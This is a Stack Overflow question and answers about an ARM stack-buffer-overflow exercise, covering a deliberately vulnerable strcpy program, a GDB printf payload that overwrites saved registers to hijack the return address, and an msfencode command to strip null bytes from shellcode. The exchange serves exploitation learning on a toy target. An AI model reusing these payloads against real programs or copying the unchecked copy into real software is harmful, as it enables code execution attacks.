Stack Overflow on ARM : Null Bytes Issue

Question

I am trying to follow the research paper by Tiger Security for ARM Exploitation : Link

For the simple stack overflow exploitation, the code is :

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void donuts(){
puts("Donuts...") ;
exit(0) ;
}
void vuln(char *arg) {
char buff[10] ;
strcpy(buff,arg);
}
int main (int argc,char **argv ){
vuln(argv[1]) ;
return 0;
}

However, when I run it on my Debian ARM Machine running on Qemu, under Ubuntu. Everything runs fine, except the part that when i have to put the addresses which would fill up the Frame Pointer, Stack Pointer and the Return Address.

So the final resulting code to run under GDB (in my case) becomes :

r `printf "AAAABBBBCCCC\x94\xac\x8b\xbe\[FP 4 bytes here]\x38\x84"`

In my case: Desired

SP : 0xbe8bac94 
FP: 0x000084ac 
Return Address: 0x00008438

Since the FP contains null bytes in the middle, Is there any way i could use that in my exploitation. Since, its in the middle, i am not able to use \xac\x84.

score 6 · Accepted Answer · answered Nov 25 '12 at 15:18

Why would you need a specific FP ? The saved FP is there to be loaded back into the corresponding register by the vuln() function when it exits; but that function does not access it in any way, so it could have any value. The loading back of FP is for the benefit of whatever code will execute immediately afterwards: normally the caller of vuln() (who wants to get his FP back), but, in your case, your exploit code, since you hijack the return address. It is then up to you to deal with a non-sensical FP value (that's your code: you can make it recompute an adequate value of FP with a few zero-free opcodes).

Edit: this article, especially section 2.4 ("Getting a known value in a register") might be enlightening.

Thanks a lot for the tip. Tried it a little more, and everything worked out perfectly. — Robert Shane, Nov 25 '12 at 16:41

score 3 · Answer 2 · answered Nov 25 '12 at 13:58

If you are having an issue with null bytes, then try to encode the shellcode before using to eliminate the null bytes. I assume you have got metasploit and able to use the encoder. Here is how it works.

shell = (" \x77\x... your shellcode")
file = open('shellcode.bin','w')
file.write(shell)
file.close()

or you can also use

echo -e "shellcode" >> shellcode.bin

and execute the following

/msfencode -b '\x00' -i /pentest/exploits/shellcode.bin -t c

I hope the above methods help you to get going. Good luck!

Thanks for your reply. Its actually the return address which contains the Null byte, not the shellcode. The return address has to be of 4 bytes, so can't use msfencode. — Robert Shane, Nov 25 '12 at 15:26

score 1 · Answer 3 · answered Nov 30 '14 at 12:54

You assumption is wrong. you don't need to use the full 4 byte address of the FP. Since your CPU will understand the thumb mode. as a result your exploit will look like :

printf "AAAABBBBCCCC\x94\xac\x8b\xbe\[FP 2 bytes without \x00\x00 here]\x38\x84"

Stack Overflow on ARM : Null Bytes Issue

3 Answers3